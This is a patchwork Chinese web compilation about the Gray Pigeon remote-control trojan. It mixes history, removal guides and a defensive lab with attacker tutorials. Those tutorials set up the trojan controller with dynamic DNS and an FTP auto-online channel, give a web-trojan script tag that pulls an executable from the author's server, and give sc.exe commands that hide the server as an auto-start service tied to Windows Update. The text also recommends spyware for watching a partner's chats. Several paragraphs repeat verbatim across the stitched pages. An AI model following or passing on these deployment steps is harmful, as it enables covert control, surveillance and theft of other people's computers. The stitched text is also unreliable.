灰鸽子病毒

Gray pigeons--灰鸽子是什么呢？灰鸽子简单的说它是远程监控软件,（黑客类）,当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件灰鸽子分为2个部分：客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端（简称：免杀），免杀的话那就是杀毒软件查不到那是一个木马程序！鸽子是国内一款著名后门。

比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

这就好比火药，用在不同的场合，给人类带来不同的影响！（其他的我也说不清楚）如果你会使的话那么它可以做很多事。

NB点的黑客可以通过各种渠道得到它想要的东西,。

（如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用）总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻（前提是需要控制到宽带上网用户）个人对鸽子的认识我对它的了解也不是全面的（现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧！）------------------------------------架设教程-------------------------------------首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧！灰鸽子下载：/file/t06ef189fa（不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜）下好鸽子后解压到任意磁盘或则桌面等任意目录！1.打开 H_Client.exe （鸽子启动程序）（如图）2.去希网注册一个用户信息地址： 如图3.注册好后登录点击【我的控制台】在动态域名(DynamicDNS) 下面有个新建点它如图4.我这有3个那是自己以前建的现在你点了建设后就自己填写一个你想要的数字或则字母组合域名（随便写也可以只要自己可以记住）如图 IP地址如果默认显示的就是你外网IP 如果你是局域网的话那么填写你的本地IP127.0.0.1或则局域网IP也可以，填写好后点【确认】5.下面就下载另外一个软件cn99qdns /file/t0be434e40 下载好后安装它安装方法全部默认如下6.OK 安装完成了默认安装在的路径是 C:\Program Files\cn99qdns 下面打开这个路径 Cn99qdns.exe打开它如图7.点击 Cn99qdns客户端上的管理帐号如图域名：就是第4个步骤叫你新建的动态域名用户：就是第二步叫你注册的用户名口令：第二步注册的那个用户名的密码（注册成功后发到你邮箱的）填写好后点【增加】看到如下图必须显示可用才行如果不可用那么就是希网那的IP错误了自己修正去！出现这个图显示可用后点确认按钮它就托盘了不管他了！---------8.现在什么都搞好了返回灰鸽子软件界面点击软件上的【工具】选择【FTP 服务器】如图9.做了第8步后会弹出个小窗口 FTP服务器填写方法FTP主目录：就是你灰鸽子解压在的目录路径，比如我解压在桌面那就是C:\Documents and Settings\Administrator\桌面\黑防鸽子\服务端口：2121 不用改把那个匿名勾点掉用户名：就是希网注册的用户密码：希网用户的密码填写好后点开启服务如图开启服务后就关掉这个小窗口10.下面点灰鸽子软件上的自动上线按钮如图（点了后会弹出小窗口）弹出小窗口FTP服务器：你在希网新建的域名端口：2121用户名：希网注册的用户名连接类型：PASV登录密码：希网用户名密码密码确认：确认密码然后点【更新IP到FTP空间】显示成功就表示OK 以下是我填写的图自己参考！11.OK了架设就这样基本完成了。

目前流行的电脑病毒有哪些电脑病毒、木马的数量依然保持着高速增长，目前主要流行的电脑病毒有哪些呢?下面由店铺给你做出详细的目前流行的电脑病毒介绍!希望对你有帮助!目前流行的电脑病毒介绍：一、机器狗病毒名称：Trojan.Psw.Onlinegame.Dog 病毒中文名：QQ大盗病毒类型：木马危险级别：影响平台：Win9X/2000/XP/NT/Me 描述：机器狗病毒因最初的版本采用电子狗的照片做图标而被网民命名为“机器狗”，该病毒变种繁多，多表现为杀毒软件无法正常运行。

该病毒的主要危害是充当病毒木马下载器，与AV终结者病毒相似，病毒通过修改注册表，让大多数流行的安全软件失效，然后疯狂下载各种盗号工具或黑客工具，给用户电脑带来严重的威胁。

机器狗病毒直接操作磁盘以绕过系统文件完整性的检验，通过感染系统文件(比如explorer.exe，userinit.exe,winhlp32.exe等)达到隐蔽启动;通过底层技术穿透冰点，影子等还原系统软件导致大量网吧(网吧联盟网吧新闻搜狗)用户感染病毒，无法通过还原来保证系统的安全;通过修复SSDT(就是恢复安全软件对系统关键API的HOOK)，映像挟持，进程操作等方法使得大量的安全软件失去作用;联网下载大量的盗号木马给广大网民的网络虚拟财产造成巨大威胁，部分机器狗变种还会下载ARP恶意攻击程序对所在局域网(或者服务器)进行ARP 欺骗影响网络安全。

二、磁碟机病毒名称：Trojan.Psw.Onlinegame.Dog 病毒中文名：QQ大盗病毒类型：木马危险级别：影响平台：Win9X/2000/XP/NT/Me 简介:电脑感染“磁碟机”变种病毒后，症状表现为运行任意程序时系统经常性死机或长时间卡住不动，病毒会以加密感染的方式感染除系统盘外的其它所有分区内的EXE文件、网页文件、RAR和ZIP压缩包中的文件等。

被感染的文件图标变为16位图标，图标变得模糊，类似马赛克状。

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

灰鸽子病毒（Backdoor.Gpigeon）介绍及清除方法-电脑资料
灰鸽子的特点是“三个隐藏”——隐藏进程、隐藏服务、隐藏病毒文件，。

灰鸽子2005感染系统后，将自身注册为系统服务，并在同一目录下生成一组（3个）隐藏的病毒文件.
HijackThis是荷兰学生merijn开发系统扫描工具，能够扫描系统版本，进程，启动项，服务项等信息，对于分析解决IE浏览器问题,以及分析病毒，木马问题有很大帮助
HijackThis扫描的log可用记事本打开。

用HijackThis 1.99.1 扫描系统信息，可以帮助解决问题
下载地址:
扫描出的结果很多都是无害的甚至是正常系统必须的,如果不是非常有把握，请勿修改!
使用方法: 解压到一个文件夹，运行HijackThis“扫描系统并保存日志”，把日志文件保存到桌面，然后用记事本打开那个文件,找到病毒所在处.
复以下项目：O23 - NT 服务: pms (Portable Media Serial) - Unknown owner - C:/WINDOWS/IEXPL0RE.EXE !
修复后重启电脑，全盘杀毒，
电脑资料
《灰鸽子病毒(Backdoor.Gpigeon)介绍及清除方法》(https://www.)。

在“安全模式”下，在“文件夹选项”的“查看”面板中勾选“显示系统文件夹内容”、“显示所有文件及文件夹”两个选项，按“确定”按钮。

根据HijackThis日志中提示的病毒文件所在路径，找到病毒文件，删除之。

重启系统，手工杀毒即告完成。

黑客入侵：灰鸽子2011使用教程（图解）写在前面：现在灰鸽子是越来越困难了，查杀太严重，新手基本上很难捉到鸡，建议如果只是想监控男女朋友QQ聊天记录的新手，直接购买网络人远程控制软件软件，非常好用的一款监控软件，免杀做得很好，鸽子其实不是免费的，空间也是收费的。

没必要浪费时间）灰鸽子教程准备工具：鸽子服务端IcoSprite图标更改器；SC.exe服务添加删除更改工具；winrar程序特点：自解压形式，双击即可制作过程：1. 首先自己配置一下鸽子服务端，配置时[启动项设置]这里面的都不要填，不要写入注册表，也不要用服务启动。

其他的随你个人爱好。

运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"‘这句是用SC建立一个服务，服务名为huigezi，路径Binpath为"%systemroot%\system32\gezi.exe"，类型type为own 与interact交互，启动类型start为自动，显示名DisplayName为"gezi"。

sc.exe descript_ion huigezi "不死鸽子"‘这句是将huigezi服务的描述改为“不死鸽子”sc config wuauserv depend= huigezi‘配置huigezi使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。

这里的目的是迷惑管理员，使其不敢轻易停止我们生成的服务，自己也可以多加点。

灰鸽子产业链一、灰鸽子灰鸽子（Hack. Huigezi）是一个集多种控制方法于一体的木马病毒，一旦用户电脑不幸感染，可以说用户的一举一动都在黑客的监控之下，要窃取账号、密码、照片、重要文件都轻而易举。

更甚的是，他们还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机（不开显示器）并利用摄像头进行录像。

截至2006年底，“灰鸽子”木马已经出现了6万多个变种。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

二、产业链在灰鸽子中,木马的制造者作为第一个环节,仅仅是提供"作案"工具,一般本身不参与到"赚钱"的环节,只是通过卖出"工具"来获利.而传播病毒环节则在购买到病毒之后,再提高价格,一级一级卖给下层的病毒购买者,非常类似于普通产品的经销商模式.木马病毒经过层层传递之后,达到病毒操作者的手里,也就是行话中的"大侠","大侠"在自己进行盗窃,破坏网络的同时召集"徒弟", 教授木马病毒控制技术和网络盗窃技术, 并收取一定的"培训费", 同时将"徒弟"发展为下线,专职盗号或窃取他人信息.被木马侵入的电脑则被形象的称为"肉鸡", "肉鸡"的个人信息,账号,游戏装备,私人照片,私人视频,QQ 号码等被专职盗号的黑客盗取后在网上的正规交易网站正常交易. 除了倒卖"肉鸡"中的数据外, 黑客们还可能将自己没有兴趣的"肉鸡"倒卖给其他的黑客继续摧残, 或者将"肉鸡"倒卖给广告商, 被控制电脑被随意投放广告,甚至干脆控制电脑点击某网站广告,一举一动都能被监视和控制. 如此严密的黑色经济产业链条令人触目惊心. 不仅有严密的产业链条,黑色经济的价格体系也非常完善.据黑客界有关人士介绍, 能够使用几天的"肉鸡"在国内可以卖到0.5 元到1 元一只, 如果可以使用半个月以上, 则可卖到几十元一只.而且不同地区的"肉鸡",价格也不一样:内陆"肉鸡"0.1——0.4 元一只, 辽宁"肉鸡"0.5——0.8 元一只, 广东"肉鸡"1 元一只, 港台"肉鸡"3 块一只, 外国"肉鸡"则能买到5 元一只,在即将到来的北京奥运期间,"奥运肉鸡"将更加抢手.三、产业链具体介绍木马、肉鸡、灰鸽子……这些圈外人刚刚听说的网络用语，构成的不仅是一个庞大的、黑色的、暴利的地下产业帝国，更是一个侵犯网民个人隐私、盗窃网络无形财产的罪恶瘟疫，游戏账号、QQ 密码、银行账号……电脑用户的个人信息和财产被一个个网络黑手窃为己有，而这一切只需要一个软件。

什么是灰鸽子病毒关于什么是灰鸽子病毒灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒，一旦用户电脑不幸感染，可以说用户的一举一动都在黑客的监控之下，要窃取账号、密码、照片、重要文件都轻而易举。

更甚的是，他们还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机(不开显示器)并利用摄像头进行录像。

截至2006年底，“灰鸽子”木马已经出现了6万多个变种。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

病毒简介(1)。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

这就好比火药，用在不同的场合，给人类带来不同的影响。

对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚，在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的`信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。

服务端对客户端连接方式有多种，使得处于各种网络环境的用户都可能中毒，包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

因涉及互联网安全法律纠纷问题，自2007年3月21日起灰鸽子已全面停止开发和注册。

互联网上现存灰鸽子版本为以前所开发灰鸽子软件及其修改版。

(2)作者葛军(1982-? )安徽潜山人，灰鸽子工作室管理员，精通Delphi、ASP、数据库编程，2001年首次将反弹连接应用在远程控制软件上，随后掀起了国内远程控制软件使用反弹连接的热潮，2005年4月，将虚拟驱动技术应用到灰鸽子屏幕控制上，使灰鸽子的屏幕控制达到了国际先进水平。

世界著名的电脑病毒有哪些计算机病毒现身江湖已多年，可以追溯到计算机科学刚刚起步之时，那时已经有人想出破坏计算机系统的基本原理。

那你知道世界上有哪些著名的电脑病毒吗?下面就让店铺和大家分享一下世界著名的电脑病毒。

世界著名的电脑病毒1.Creeper(1971年)最早的计算机病毒Creeper(根据老卡通片《史酷比(Scooby Doo )》中的一个形象命名)出现在1971年，距今以后42年之久。

当然在那时，Creeper还尚未被称为病毒，因为计算机病毒尚不存在。

Creeper由BBN技术公司程序员罗伯特·托马斯(Robert Thomas)编写，通过阿帕网( ARPANET，互联网前身)从公司的DEC PDP-10传播，显示“我是Creeper，有本事来抓我呀!(I'm the creeper， catch me if you can!)”。

Creeper在网络中移动，从一个系统跳到另外一个系统并自我复制。

但是一旦遇到另一个Creeper，便将其注销。

2.Elk Cloner病毒(1982年)里奇.斯克伦塔(Rich Skrenta)在一台苹果计算机上制造了世界上第一个计算机病毒。

1982年，斯克伦塔编写了一个通过软盘传播的病毒，他称之为“Elk Cloner”，那时候的计算机还没有硬盘驱动器。

该病毒感染了成千上万的机器，但它是无害的：它只是在用户的屏幕上显示一首诗，其中有两句是这样的：“它将进入你所有的磁盘/它会进入你的芯片。

”3.梅利莎 (Melissa，1999年)Melissa病毒由大卫·史密斯(David L. Smith)制造，是一种迅速传播的宏病毒，它作为电子邮件的附件进行传播，梅丽莎病毒邮件的标题通常为“这是你要的资料，不要让任何人看见(Here is that document you asked for，don't show anybody else)”。

一禁用系统恢复使用组策略编辑器1. 单击开始，单击运行，键入gpedit.msc，然后单击确定。

2. 展开“计算机配置”，展开“管理模板”，展开“系统”，然后单击系统恢复。

3. 双击“关闭系统恢复”，然后在设置选项卡上，选择禁用。

4. 双击“关闭配置”，然后在设置选项卡上，选择启用。

有关这些设置的作用的详细信息，请在单击属性对话框上的解释选项卡。

5. 单击应用，然后单击确定。

二升级病毒定义库Symantec 可LIVEUPDA TE,NORTON也能吧三在安全模式扫描,并删除感染文件操作后可离开安全模式,跳到四四删除注册表键值Symantec强烈建译备份注册表.click 开始>运行-- 输入regedit,确定后进入HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Connection Wizard删除右侧值: "Compleated" = "1"再进入,删除下列键(key)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\GrayPigeonServerHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_GRAYPIGEONSERVER离开注册表编辑器五查找并停止服务click 开始>运行-- 输入services.msc,确定后进入定位并选择探测到的Trojan.Feutel服务点吉动作(Action)>属性(Properties),点吉停止改变启动类型为手动点吉确定,关闭服务窗口重启XfeliX关于Trojan.Feutel(灰鸽子)病毒无法清除的解决办法前段时间浏览网页的时候，杀毒软件报告发现病毒Trojan.Feutel，病毒位于c:\windiwos，文件名称为G_Server.exe、G_Server.dll和G_Server_Hook.dll，而且杀毒软件无法清除，感觉应该是中了恶意代码（木马）。

中了灰鸽子怎么解决电脑中了灰鸽子病毒，首先不要惊慌，解决办法是有的，店铺来告诉你，下面由店铺给你做出详细的灰鸽子病毒解决方法介绍!希望对你有帮助!灰鸽子病毒解决方法：灰鸽子病毒解决步骤1、请下载汉化版hijackthis备用,下载汉化版killbox备用,删除文件利器HijackThis v1.99.1 首页绑架克星它能够将绑架您浏览器的程序揪出来!并且移除之!或许您只是浏览某个网站、安装了某个软件，就发现浏览器设定已经被绑架了，一般常见的绑架方式莫过于强制窜改您的浏览器首页设定、搜寻页设定，现在有了这个工具，可以将所有可疑的程序全抓出来，进行分析。

本来它只能看看浏览器绑架的问题，在众多网友的实践中发现它还能够分析的出灰鸽子的大致位置和服务项。

灰鸽子病毒解决步骤2、直接运行hijackthis.exea、选以上都不是，只是进入启动程序(进入主界面)b、然后点左下角的扫描c、再扫描出来的界面中直接查找023项目，就是服务项，如果发现有这样的023项目，那么恭喜你了，中了灰鸽子灰鸽子病毒如:O23 - NT 服务: Gray_Pigeon_Server2.0 (GrayPigeonServer2.0) - Unknown owner - C:\WINDOWS\G_Server2.0.exeO23 - NT 服务: Generic_Save_Server (Fast Double) - Unknown owner - C:\WINDOWS\Generic Hoster.exeO23 - NT 服务: Gray_Pigeon_Server (GrayPigeonServer) - Unknown owner - C:\WINDOWS\1.exeO23 - NT 服务: Gray_Pigeon_Server (GrayPigeonServer) - Unknown owner - C:\WINDOWS\G_Server.exeO23 - Service: Gray_Pigeon_Server (GrayPigeonServer) -Unknown owner - C:\WINDOWS\G_Server.exe等等，共同特点是在023项，Gray_Pigeon_Server+Unknown owner +C:\WINDOWS(就是直接安装在系统盘/win下面) 下面俺来谈谈借助绿色工具,汉化版hijackthis和汉化版killbox来谈谈手工清楚灰鸽子的经历,下面手工查杀过程.灰鸽子病毒解决步骤实战一:O23 - NT 服务: RpcSo (Remote Procedure Call (RPC)) - Unknown owner - C:\WINDOWS\RpcSs.exe根据楼主的描叙(帖主的瑞星报告灰鸽子病毒感染文件C:\WINDOWS\RpcSs.exe,这是俺第一次实战查杀灰鸽子的经历,所有映像特别深)),这是灰鸽子的项,删除下面的文件后,用hiujackthis修复下载汉化版killbox(删除文件利器)填入完整路径删除下面文件，不放心到安全模式下删除，(xp建议关闭系统还原，其他包括xp清理所有临时文件)如果有的话让killbox帮楼主强行删除。

手工清除灰鸽子有什么方法当你的电脑中了灰鸽子电脑病毒时，你会怎么办，没事不要紧的!下面由店铺给你做出详细的手工清除灰鸽子方法介绍!希望对你有帮助!手工清除灰鸽子方法介绍：当我运行那个文件时，KV杀毒软件就弹出了告警窗口木马被隔离为什么到这时才发现呢?因为这种木马采用了“组装合成法”，就是把一个合法的程序和一个木马绑定，当运行合法程序时，木马就自动加载，同时，由于绑定后木马的代码发生了变化，根据特征码扫描的杀毒软件是很难查出来的。

这也就是我中招的原因。

一波三折中了木马，就要想办法清除它。

这个木马已被KV“禁用”，无法与远程的木马客户端进行通信。

单从这个角度讲，如果不去管它，也无大碍。

可每次启动电脑KV就报告，让人整天提心吊胆，并且我的Maxthon浏览器每次关闭网页窗口，都要弹出“error”提示，这种情况以前从未发生过，显然是这个木马搞的鬼!怎么办呢?因为是实验室的电脑，光驱和软驱被拆掉了，不支持U 盘启动，也没有做过Ghost备份，所以既进入不了DOS，也无法用Ghost备份来恢复。

我决定先试试在Win2000中能否用KV将木马清除掉，可当KV查到Winserverhook.dll时，电脑就自动关机重启了，而且启动后要蓝屏查硬盘!随后通过多次试验发现，用KV2004去查，不论是杀毒状态、查毒状态还是询问状态，只要一查到winServerHook.Dll这个文件，电脑就立刻重启。

而且也无法复制、剪切、删除和修改winServerHook.Dll这个文件。

这使我愈发相信，winServerHook.Dll是个重要的、开机就要调入内存的系统动态链接库(后来的事实证明，这是这个木马最容易让人上当之处!)。

此后，我检查了注册表和几个重要的系统文件。

传统的木马会在注册表里或Win.ini、System.ini文件里留下某些痕迹，例如在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Run中加上可疑的键值。

木马灰鸽子防护场景灰鸽子是国内一个著名的后门程序。

灰鸽子变种木马运行后，会自我复制到Windows目录下，并自行将安装程序删除。

修改注册表，将病毒文件注册为服务项实现开机自启。

木马程序还会注入所有的进程中，隐藏自我，防止被杀毒软件查杀。

自动开启IE浏览器，以便与外界进行通信，侦听黑客指令，在用户不知情的情况下连接黑客指定站点，盗取用户信息、下载其它特定程序。

通过对灰鸽子的运行过程及原理进行了解，掌握对木马的防御实验目标●掌握木马的原理●通过木马对主机控制过程的了解，掌握防御方法●树立安全的防范意识●可以根据环境要求设定有效的防范策略实验拓扑VM Server VM Client实验环境Server：Windows XP[服务端]（因实验需要 Server 服务端登录账户：administrator，密码：123456）Client：Windows XP[客户端]灰鸽子[企业版]Server_Setup.exe服务端木马(可由灰鸽子生成)灰鸽子专杀工具[工具]利用灰鸽子进行控制灰鸽子木马程序版本众多，这里我们选择了使用较多的“灰鸽子远程管理企业版Build060228”版本。

【注释】安装灰鸽子客户端程序，目的为了控制被种植了灰鸽子服务端程序的肉鸡，客户端本身没有危害性。

1.在客户端上运行“灰鸽子[企业版]”程序，主界面如图 1：(图1)2.点击工具栏中的“配置服务程序”按钮，弹出如图2对话框，可根据自己要求定制生成服务端程序，用于种植在肉鸡中。

(图2)【注释】用户可以定制肉鸡服务端开放的端口、连接密码、控制权限等。

自动上线功能可以在肉鸡启动时，自动告知控制者上线信息。

3.添加好相应的信息后,点击“生成服务器”按钮，可以生成EXE可执行程序。

这里我们在C盘根目录已经提供了一个生成好的服务端程序Server_Setup.exe，其连接端口为7812，连接密码为7812，具有所有控制权限。

4.把生成的Server_Setup.exe通过网络共享方式复制至服务端上，并在服务器上双击运行该程序。

二十个比较著名的计算机病毒计算机病毒危害惊人：硬盘数据被清空，网络连接被掐断，好好的机器变成了毒源，开始传染其他计算机。

有报告显示，仅2008年，计算机病毒在全球造成的经济损失就高达85亿美元。

计算机病毒现身江湖已多年，可以追溯到计算机科学刚刚起步之时，那时已经有人想出破坏计算机系统的基本原理。

1949年，科学家约翰·冯·诺依曼声称，可以自我复制的程序并非天方夜谭。

不过几十年后，黑客们才开始真正编制病毒。

直到计算机开始普及，计算机病毒才引起人们的注意。

以下是小编为你整理的二十个比较著名的计算机病毒的相关资料，希望能帮到你。

二十个比较著名的计算机病毒1.Creeper(1971年)最早的计算机病毒Creeper出现在1971年，距今以后42年之久。

当然在那时，Creeper还尚未被称为病毒，因为计算机病毒尚不存在。

Creeper由BBN技术公司程序员罗伯特·托马斯(Robert Thomas)编写，通过阿帕网( ARPANET，互联网前身)从公司的DEC PDP-10传播，显示“我是Creeper，有本事来抓我呀!(I'm the creeper，catch me if you can!)”。

Creeper在网络中移动，从一个系统跳到另外一个系统并自我复制。

但是一旦遇到另一个Creeper，便将其注销。

2.Elk Cloner病毒(1982年)里奇.斯克伦塔(Rich Skrenta)在一台苹果计算机上制造了世界上第一个计算机病毒。

1982年，斯克伦塔编写了一个通过软盘传播的病毒，他称之为“Elk Cloner”，那时候的计算机还没有硬盘驱动器。

该病毒感染了成千上万的机器，但它是无害的：它只是在用户的屏幕上显示一首诗，其中有两句是这样的：“它将进入你所有的磁盘/它会进入你的芯片。

”3.梅利莎 (Melissa，1999年)Melissa病毒由大卫·史密斯(David L. Smith)制造，是一种迅速传播的宏病毒，它作为电子邮件的附件进行传播，梅丽莎病毒邮件的标题通常为“这是你要的资料，不要让任何人看见(Here is that document you asked for， don't show anybody else)”。

“灰鸽子”病毒代码的特点和关键技术解析一、“灰鸽子”病毒概述灰鸽子是国内一款著名后门，比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。

其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

灰鸽子客户端和服务端都是采用Delphi编写，黑客利用客户端程序配置出服务端程序。

服务端对客户端连接方式有多种，使得处于各种网络环境的用户都可能中毒，包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

灰鸽子英文名为W in32.Hack.Huigez，这个木马黑客工具大致于2001年出现在互联网，当时被判定为高危木马。

灰鸽子病毒危害程度非常大，是熊猫烧香的10倍以上，灰鸽子病毒集中爆发，据推算，有2000万台电脑可能被控制，而黑客随之买卖控制权，月入上万元。

经过其作者不懈努力，该病毒从2004年起连续五年荣登国内10大病毒排行榜，至今已经衍生出超过10万个变种。

二、“灰鸽子”的关键技术1.植入技术灰鸽子植入是灰鸽子攻击目标系统最关键的一步，是后续攻击活动的基础。

当前，灰鸽子的植入方法可以分为两大类，即被动植入和主动植入。

被动植入是指通过人工干预方式才能将灰鸽子程序安装到目标系统中，植入过程必须依赖于受害用户的手工操作；而主动植入则是指主动攻击方法，是将灰鸽子程序通过程序自动安装到目标系统中，植入过程无需受害用户的操作。

被动植入主要通过社会工程方法将灰鸽子程序伪装成合法的，以达到降低受害用户警觉性,诱骗用户的目的。

2.隐藏技术灰鸽子设计者为了能逃避安全检测,就要设法隐藏灰鸽子的行为或痕迹，其主要技术目标就是将灰鸽子的本地活动行为、灰鸽子远程通信过程进行隐藏。

2.1本地行为活动隐藏现在的操作系统支持LKM (Loadable KernelModules)功能，通过LKM可增加系统功能，而且不需要重新编译内核，就可以动态地加载，如Linux, Solaris和FreeBSD都支持LKM。

电脑病毒“灰鸽子”推荐文章怎么防止电脑感染灰鸽子木马热度：如何防止电脑感染灰鸽子木马成为肉鸡热度：电脑中了灰鸽子病毒怎么样查杀热度：中了灰鸽子怎么解决热度：灰鸽子病毒的原理和运行方式是怎么样的热度：灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒，用户电脑不幸感染，一举一动就都在黑客的监控之下，窃取账号、密码、照片、重要文件都轻而易举，下面店铺为大家详细的介绍下灰鸽子病毒，希望对你有帮助，谢谢。

灰鸽子病毒：灰鸽子还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机并利用摄像头进行录像。

截至2006年底，“灰鸽子”木马已经出现了6万多个变种。

合法情况下使用，它是一款优秀的远程控制软件。

如果做一些非法的事，灰鸽子就成了强大的黑客工具。

灰鸽子客户端和服务端采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的信息主要包括上线类型、主动连接时使用的公网IP、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。

中文学名灰鸽子自2001年，灰鸽子诞生之日起，就被反病毒专业人士判定为最具危险性的后门程序，并引发了安全领域的高度关注。

2004年、2005年、2006年，灰鸽子木马连续三年被国内各大杀毒厂商评选为年度十大病毒，灰鸽子也因此声名大噪，逐步成为媒体以及网民关注的焦点。

人们在震惊于灰鸽子给广大电脑用户带来的危害的同时，不禁要问，灰鸽子是如何从一个模仿其他病毒开始，发展成为国内极具影响的十大病毒、甚至毒王的呢?[1]灰鸽子自2001年出现至今，主要经历了模仿期、飞速发展期以及全民黑客时代三大阶段。

灰鸽子服务端加壳之后仅有70kb，比葛军的灰鸽子小了近10倍。

国家多线程上线分组。

可视化远程开户。

可以躲过主流管理员的检测方式。

隐蔽性强。

模仿期飞速发展期全民黑客时代2001年-2003年2004年-2005年2006年-2007年模仿期(2001年-2003年)2001年，国内互联网逐步走向普及，网络病毒也伴随着互联网的发展日益取代传统意义上的病毒，而到了2002年，以“电子邮件”、“网络下载和浏览”等方式传播的病毒开始大量涌现，互联网安全成为大众关注的焦点。

电脑中了“灰鸽子”病毒后，会出现什么情况？
分类:电脑/网络 >> 反病毒
问题描述:
我怀疑我的电脑中了“灰鸽子”病毒，所以，想了解“灰鸽子”病毒，如果电脑染上了此病毒，会出现什么状况！
请求高认为我指点迷津
解析:
发作症状：一旦用户中此病毒，就可能被后门种植者有效控制计算机。

控制者可利用病毒自动上线功能轻易查找用户电脑IP；控制后攻击者可任意操作用户电脑上的文件，发送多种控制命令，操作本机注册表，获取用户电脑IP地址、地址位置、电脑名称、系统版本、备注等信息，还具有语音监听、语音发送、远程视频监控功能，用户的一举一动都将清晰暴露在后门种植者面前，直接降低系统安全性能.
中了这种病毒，可能系统会比较慢，而且还会自动关机．。

如何防止电脑感染灰鸽子木马成为肉鸡如何防止电脑感染灰鸽子成为肉鸡?正如我们所知，灰鸽子木马可以伪装成图片、文档等，利用多种方式诱使人们点击，而后又可以完全全自动后台隐蔽运行，让人防不胜防。

下面是店铺跟大家分享的是如何防止电脑感染灰鸽子木马成为肉鸡，欢迎大家来阅读学习。

如何防止电脑感染灰鸽子木马成为肉鸡方法/步骤第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建IP 安全策略”，于是弹出一个向导。

在向导中点击“下一步”按钮，为新的安全策略命名;再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。

